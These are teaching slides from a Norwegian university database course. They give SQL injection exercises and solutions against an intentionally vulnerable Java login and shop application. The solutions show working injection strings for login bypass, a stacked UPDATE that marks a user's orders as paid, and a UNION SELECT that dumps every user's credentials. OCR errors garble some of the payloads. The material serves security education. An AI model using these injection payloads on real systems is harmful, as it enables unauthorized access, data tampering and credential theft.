IN2090 - Databaser og datamodellering

12 - Sikkerhet: Eksempler

Leif Harald Karlsen leifhka@ifi.uio.no



Oppgaver

Bruk den SQL-injection-sårbare Java-implementasjonen¹ til å:

- 1. Logge inn som en bruker som bor i Streetroad
- 2. Logge inn med brukeren som har kjøpt for mest penger
- 3. Setter alle bestillinger til brukeren hackzor til betalt
- 4. (Vanskelig) Printer ut all informasjon om alle brukere

https://www.uio.no/studier/emner/matnat/ifi/IN2090/h20/foiler/userfrontendsqlinjection.zip

Oppgave 1: Løsning

```
$ java -cp .:postgresql.jar UserFrontendSQLInjection
-- USER FRONTEND --
Please choose an option:
1. Register
2. Login
3. Exit
Option: 2
-- LOGIN --
Username: 'OR address LIKE 'Streetroad%'--
Password:
Welcome Carl Smith
-- SEARCH --
```

Oppgave 2: Løsning

(Merk: Formaterer spørringen litt penere her for lesbarhet)

```
$ java -cp .:postgresql.jar UserFrontendSQLInjection
-- USER FRONTEND --
Please choose an option:
1. Register
 2. Login
 3. Exit
Option: 2
 -- I.OGTN --
Username: 'OR uid = (SELECT uid FROM (SELECT o.uid, sum(p.price * o.num) AS total
                      FROM ws.orders AS o INNER JOIN ws.products AS p USING (pid)
                      GROUP BY o.uid ORDER BY total DESC LIMIT 1) t) --
Password:
Welcome Ann Pat
-- SEARCH --
```

(Merk: bestillingene er tilfeldig generert, så det er ikke sikkert at *Ann Pat* er den som har bestilt mest i din database)

Oppgave 3: Løsning

(Merk: Formaterer spørringen litt penere her for lesbarhet)

```
$ java -cp .:postgresql.jar UserFrontendSQLInjection
-- USER FRONTEND --
Please choose an option:
1. Register
2. Login
 3. Exit
Option: 1
-- REGISTER NEW USER --
Username: a
Password: b
Name: c
Address: d'): UPDATE ws.orders SET paved = 1 WHERE uid IN
              (SELECT uid FROM ws.users WHERE username = 'hackzor')--
New user a added!
```

Oppgave 4: Løsning

(Merk: Formaterer spørringen litt penere her for lesbarhet)

```
$ java -cp .:postgresql.jar UserFrontendSQLInjection
-- USER FRONTEND --
Please choose an option:
1. Register
2. Login
3. Exit
Option: 2
-- I.OGTN --
Username: ' OR true--
Pagguord:
Welcome Carl Smith
-- SEARCH --
Search: ' AND false UNION
    SELECT O AS pid.
           format('Name: %s. Address: %s. Username: %s. Password: %s'.
                  name, address, username, password) AS name,
           O AS price, '' AS category, '' AS description
    FROM ws.users--
Category:
-- RESULTS --
===Name: Amir Nazur, Address: Higarden Road 98, 7762 Hitown, Username: mirz, Password: asdf9876===
Product ID: 0
Price: 0.0
Category:
Description:
===Name: Mary Sagan, Address: Placestreet 12B, 4356 Nicetown, Username: hackzor, Password: pass1234===
[...]
```